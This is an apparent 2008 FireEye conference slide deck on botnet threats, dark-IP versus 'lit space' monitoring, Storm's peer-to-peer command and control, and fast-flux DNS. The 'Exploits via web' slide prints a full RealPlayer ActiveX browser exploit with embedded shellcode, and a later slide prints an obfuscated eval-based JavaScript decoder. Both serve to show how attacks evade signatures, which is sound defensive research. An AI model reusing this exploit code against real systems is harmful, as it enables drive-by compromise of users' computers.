Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008

2 Botnets = Targeted Infection + Remote Control Payload  Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities  Remote control payload enables further malicious payload installs  Malicious payloads enable monetization via:  Spam relay (leased to spammers)  DDoS (extortion business model)  ID Theft (consumer, business, or gov’t)  Intellectual property theft  Phishing site hosting  Click fraud  Online financial services fraud  E-commerce site fraud

33 Botnets Are A Critical Threat Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007 Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches. Up to a quarter of computers on the net may be used by cyber criminals in so- called botnets - Vint Cerf Botnets: A Global Pandemic

4 Growing Wave of Concern Nuisance Late 1990’s Concern Low Danger Beyond Botnet Attack Evolution High Magnitude of Threat Consumer Service Provider Enterprise Government Cyber warfare Mass-scale DDoS Mass-scale SPAM Click fraud Identity Theft Phishing Pharming Wide-scale revenue loss Corporate Espionage Total enterprise collapse Intellectual Property Theft Compliance Risks Productivity Loss Brand Damage Resource Inefficiency Cyber-terrorism DDoS SPAM Spyware platform Steal resources

Traditional Botnet (first half 2000s) Grow by active scanning Command & Control via IRC

6 Still a lot of that about Portion of a botnet tracked by FireEye botwall network

Monitoring Traditional Botnets Dark IP Space/Network Telescope Wait for bot to scan, and try to capture

Tradeoffs of Dark IP Monitoring  Advantages  Fidelity - if something scans dark IP, is likely bad  Cheap/easy - can cover a lot of IP space that wasn’t being used  Especially internally to enterprises  Disadvantages  Some bots avoid the dark-IP space - scan selectively  Persuading the bot to talk can be tricky  Need deep interaction honeypot to do it right  Bots moving away from scanning as a technique  Bot-owners can learn Dark Ips if feedback (eg to signatures)

Directions in Botnet Technology  Technology evolution is rapid  Well funded industry  Smart technologists  Disciplined execution of attacks and management of resources/business  Gives various trends that render current defensive technologies obsolete 1.Exploits via web/ (bypass firewall) 2.Obfuscation and polymorphism (bypass AV/IPS) 3.Distributed command-and-control, and high turnover of assets, 1.renders trackdown and clean-up hard 2.DNS tracking hard 3.Web crawling behind the curve

Exploits via web if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75% 06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf(" ")==-1){if(navigator.userLanguage.toLowerCase()=="zh- cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion==" ")ret=unescape("%63%11%08%60");else if(RealVersion==" ")ret=unescape("%63%11%04%60");else if(RealVersion==" ")ret=unescape("%79%31%01%60");else if(RealVersion==" ")ret=unescape("%79%31%09%60");else if(RealVersion==" ")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvk KNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NX KjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnX zmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSN zT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWin InPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZ odKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZo WsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInO oDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vv YiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQe lhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJ QspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsq mk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLN ktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x 8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();

More obfuscated example function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23, 3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j-- ){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)- 48];sttp=saam >8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2 hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25") Variables and encoding can be polymorphic - not much for signatures to go on

Preliminary Expt on open network (Dec)  ~ 5000 users  ~ 3 hrs of intermittent data  Parsed HTTP and entities  ~ 200,000 HTTP containing flows  Google safe browsing API alerted on ~700 of them  Manually verified - only 11 checked out  Daily rate is ~100 incidents/day  Don’t know how many were successful at this point  Not sure how typical this period is so only order of magnitude estimate  Google safe browsing API is 99%+ false positives  Reasons not well understood yet  Gearing up for another experimental run  Hopefully LEET 08 paper

Distributed Command and Control - Storm Grow by spam/malicious downloads - been running for 12 months now in plain sight No scanning! 115,000 seen from a single.edu eDonkey UDP messages in Peer-to-Peer command and control

Dynamic Infrastructure - Fast Flux DNS Servers Small Number of Persistent Content Servers Large Number of Dynamic Proxies

FireEye, Inc. Confidential15 Rendering Current Approaches Obsolete GAP Need security solution that scales with exponential nature of threat Antivirus Bypass by not matching AV signatures IDS/IPS Bypass by not matching signatures & using other infection vectors Network Behavior Analysis Bypass by low & slow spread Dark IP Honeypots Bypass by not targeting dark IP addresses and honeypots

FireEye, Inc. Confidential16 Lit Space Monitoring

FireEye, Inc. Confidential17 Global Deployment Local Analysis & Protection Global Analysis & Intelligence Distribution

FireEye, Inc. Confidential Thank you! Q & A